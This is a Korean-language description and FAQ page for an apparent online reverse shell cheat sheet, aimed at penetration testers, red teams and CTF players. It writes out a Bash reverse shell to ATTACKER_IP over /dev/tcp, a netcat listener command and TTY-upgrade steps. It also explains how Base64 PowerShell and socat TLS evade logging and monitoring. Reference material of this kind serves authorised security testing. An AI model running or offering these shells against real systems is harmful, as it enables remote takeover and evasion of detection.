liminfo

Reverse Shell Reference

리버스 셸 페이로드 레퍼런스

25개 결과

Reverse Shell Reference 소개

리버스 셸 치트시트는 언어·도구별로 정리된 25개 복사 가능한 리버스 셸 페이로드 모음입니다. Bash(인터랙티브, read-line, UDP, mkfifo, exec), Python(2, 3, PTY, 원라이너), PHP(exec, proc_open, system, 웹셸), PowerShell(TCP, Base64, Nishang), Netcat(with/without -e, ncat SSL, 리스너), Perl, Ruby, Java, socat, TTY 업그레이드까지 포함합니다.

모의침투 테스터, 레드팀, CTF 참가자, 보안 연구원이 실전에서 신뢰할 수 있는 리버스 셸 원라이너에 빠르게 접근할 수 있도록 설계했습니다. 각 페이로드에 ATTACKER_IP와 PORT 플레이스홀더가 포함되어 바로 대체하여 사용할 수 있습니다.

브라우저에서 바로 로딩되며 다운로드나 회원가입이 필요 없습니다. 한국어/영어, 다크 모드, 반응형 레이아웃을 지원합니다.

주요 기능

  • Bash, Python, PHP, PowerShell, Netcat, 기타(Perl, Ruby, Java, socat) 6개 카테고리 25개 리버스 셸 페이로드
  • Bash 5종: 인터랙티브(-i), read-line, UDP, mkfifo 명명 파이프, exec 파일 디스크립터
  • Python 2/3, PTY 스폰 셸(완전 TTY 지원), 간결한 원라이너 등 4가지 Python 페이로드
  • PHP exec, proc_open, system(mkfifo), 커맨드 웹셸 등 웹 애플리케이션 시나리오용 페이로드
  • PowerShell TCP 클라이언트, Base64 인코딩 우회, Nishang 프레임워크 연동
  • Netcat -e 유무, Nmap ncat SSL 암호화, 리스너 설정(nc -lvnp) 명령
  • TTY 셸 업그레이드: Python pty.spawn, script /dev/null, stty raw -echo, TERM 설정
  • socat OpenSSL 인증서 기반 TLS 암호화 리버스 셸

자주 묻는 질문

어떤 언어와 도구의 리버스 셸을 다루나요?

Bash 5종(인터랙티브, UDP, mkfifo, exec 등), Python 4종(2/3/PTY/원라이너), PHP 4종(exec, proc_open, system, 웹셸), PowerShell 3종(TCP, Base64, Nishang), Netcat 4종(-e 유무, ncat SSL, 리스너), 기타 5종(Perl, Ruby, Java, socat, TTY 업그레이드) 총 25개 페이로드를 수록합니다.

리버스 셸 페이로드는 어떻게 사용하나요?

먼저 공격 머신에서 리스너를 설정합니다(nc -lvnp PORT). 원하는 페이로드를 복사한 뒤 ATTACKER_IP를 리스너 IP로, PORT를 선택한 포트로 대체하여 대상 시스템에서 실행합니다. 대상이 리스너에 역방향으로 연결되어 인터랙티브 셸을 획득할 수 있습니다.

리버스 셸과 바인드 셸의 차이는 무엇인가요?

리버스 셸은 대상이 공격자의 리스너로 연결하는 방식으로, 인바운드 연결을 차단하는 방화벽 뒤의 대상에 효과적입니다. 바인드 셸은 대상에서 포트를 열고 공격자가 접속하는 방식입니다. 아웃바운드 연결은 차단되는 경우가 적어 모의침투에서는 리버스 셸이 주로 사용됩니다.

기본 리버스 셸을 완전한 TTY로 업그레이드하는 방법은?

python3 -c "import pty; pty.spawn('/bin/bash')" 또는 "script /dev/null -c bash"로 PTY를 얻습니다. Ctrl+Z로 백그라운드 전환 후 로컬 터미널에서 "stty raw -echo; fg"를 실행하고, 셸에서 "export TERM=xterm"을 설정합니다. 명령 히스토리, 탭 자동완성, 올바른 터미널 처리가 가능해집니다.

Linux 대상에서 가장 먼저 시도할 리버스 셸은?

Bash 인터랙티브 셸(bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1)을 먼저 시도하세요. 추가 도구가 필요 없습니다. /dev/tcp를 사용할 수 없으면 mkfifo + netcat 변형을, Python이 설치되어 있으면 Python 3 PTY 셸이 최고의 인터랙티브 경험을 제공합니다. 다른 인터프리터가 없으면 Perl이나 Ruby를 사용하세요.

socat 암호화 리버스 셸은 어떻게 동작하나요?

socat는 OpenSSL로 공격자-대상 간 TLS 암호화 터널을 생성합니다. 공격자는 PEM 인증서로 리스너를 실행하고, 대상은 socat OPENSSL로 접속합니다. 모든 트래픽이 암호화되어 네트워크 모니터링으로 탐지하기 어렵습니다.

PowerShell Base64 페이로드는 어떤 용도인가요?

Base64 인코딩된 PowerShell 페이로드는 명령줄 로깅과 기본 문자열 탐지를 우회하는 데 사용됩니다. 실제 리버스 셸 명령을 Unicode Base64로 인코딩한 뒤 powershell -enc로 실행합니다. Windows 환경에서 보안 도구가 알려진 악성 문자열을 모니터링할 때 효과적입니다.

이 도구는 인가된 보안 테스트 전용인가요?

네. 이 페이로드는 인가된 모의침투, 레드팀 훈련, CTF 대회, 보안 연구를 위한 레퍼런스입니다. 무단 시스템 접근은 불법입니다. 항상 명시적인 서면 허가를 받은 후 테스트하세요. 이 레퍼런스는 합법적인 보안 평가에서 전문가가 효율적으로 작업하도록 돕습니다.